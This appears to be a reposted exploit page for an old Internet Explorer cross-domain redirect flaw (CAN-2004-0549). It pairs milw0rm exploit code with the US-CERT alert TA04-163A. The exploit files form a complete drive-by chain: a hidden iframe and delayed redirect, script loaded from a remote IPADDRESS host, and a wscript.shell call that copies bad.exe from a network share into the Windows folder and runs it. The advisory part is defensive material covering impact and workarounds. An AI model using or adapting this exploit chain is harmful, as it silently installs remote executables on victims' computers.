CVE  通用漏洞与披露Common Vulnerabilities and Exposures

-----------------------------------------------------  default.htm  -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;dialogWidth:1\;").
location="vbscript:\"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm  ---------------------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js  ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js  -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var wF="%windir%\\\\_tmp.exe";var 
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp  ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next

Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>


# milw0rm.com [2004-07-13]
		

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Technical Cyber Security Alert TA04-163A

Cross-Domain Redirect Vulnerability in Internet Explorer

   Original release date: June 11, 2004
   Last revised: --
   Source: US-CERT


Systems Affected

     Microsoft Windows systems


Overview

   A cross-domain vulnerability in Internet Explorer (IE) could allow an
   attacker to execute arbitrary code with the privileges of the user
   running IE.


I. Description

   There is a cross-domain vulnerability in the way IE determines the
   security zone of a browser frame that is opened in one domain then
   redirected by a web server to a different domain. A complex set of
   conditions is involved, including a delayed HTTP response (3xx status
   code) to change the content of the frame to the new domain.
   Vulnerability Note VU#713878 describes this vulnerability in more
   technical detail and will be updated as further information becomes
   available.

   Other programs that host the WebBrowser ActiveX control or use the
   MSHTML rendering engine, such as Outlook and Outlook Express, may also
   be affected.

   This issue has been assigned CVE CAN-2004-0549.


II. Impact

   By convincing a victim to view an HTML document (web page, HTML
   email), an attacker could execute script in a different security
   domain than the one containing the attacker's document. By causing
   script to be run in the Local Machine Zone, the attacker could execute
   arbitrary code with the privileges of the user running IE.

   Publicly available exploit code exists for this vulnerability, and
   US-CERT has monitored incident reports that indicate that this
   vulnerability is being actively exploited.


III. Solution

   Until a complete solution is available from Microsoft, consider the
   following workarounds.

 Disable Active scripting and ActiveX controls

   Disabling Active scripting and ActiveX controls in the Internet Zone
   (or any zone used by an attacker) appears to prevent exploitation of
   this vulnerability. Disabling Active scripting and ActiveX controls in
   the Local Machine Zone will prevent widely used payload delivery
   techniques from functioning. Instructions for disabling Active
   scripting in the Internet Zone can be found in the Malicious Web
   Scripts FAQ. See Microsoft Knowledge Base Article 833633 for
   information about securing the Local Machine Zone. Also, Service Pack
   2 for Windows XP (currently at RC1) includes these and other security
   enhancements for IE.
 
 Do not follow unsolicited links

   Do not click on unsolicited URLs received in email, instant messages,
   web forums, or internet relay chat (IRC) channels. While this is
   generally good security practice, following this behavior will not
   prevent exploitation of this vulnerability in all cases.
  
 Maintain updated anti-virus software

   Anti-virus software with updated virus definitions may identify and
   prevent some exploit attempts. Variations of exploits or attack
   vectors may not be detected. Do not rely solely on anti-virus software
   to defend against this vulnerability. More information about viruses
   and anti-virus vendors is available on the US-CERT Computer Virus
   Resources page.


Appendix B. References

     * Vulnerability Note VU#713878-
       <http://www.kb.cert.org/vuls/id/713878>

     * Malicious Web Scripts FAQ -
       <http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps>

     * Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>

     * CVE CAN-2004-0549 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0549>

     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>

     * Windows XP Service Pack 2 RC1 -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/wi
       nxpsp2.mspx>

     * Increase Your Browsing and E-Mail Safety -
       <http://www.microsoft.com/security/incident/settings.mspx>

     * Working with Internet Explorer 6 Security Settings -
       <http://www.microsoft.com/windows/ie/using/howto/security/settings
       .mspx>

     _________________________________________________________________


   Public incidents related to this vulnerability were reported by Rafel
   Ivgi. Thanks to Jelmer for further research and analysis.
 
    _________________________________________________________________


   Feedback can be directed to the author:  Art Manion.

   Send mail to <mailto:cert@cert.org>.

   Please include the Subject line "TA04-163A Feedback VU#713878".

     _________________________________________________________________


   Copyright 2004 Carnegie Mellon University.

   Terms of use:  <http://www.us-cert.gov/legal.html>

     _________________________________________________________________

   The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA04-163A.html>

     _________________________________________________________________


   Revision History

   June 11, 2004: Initial release

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAyhdcXlvNRxAkFWARAt2eAKCRDeqWLNgG+xXJtd0PyRGeN+S69ACfcXoi
GDMew8rDUjleel9OLMqs9W4=
=ZAyn
-----END PGP SIGNATURE-----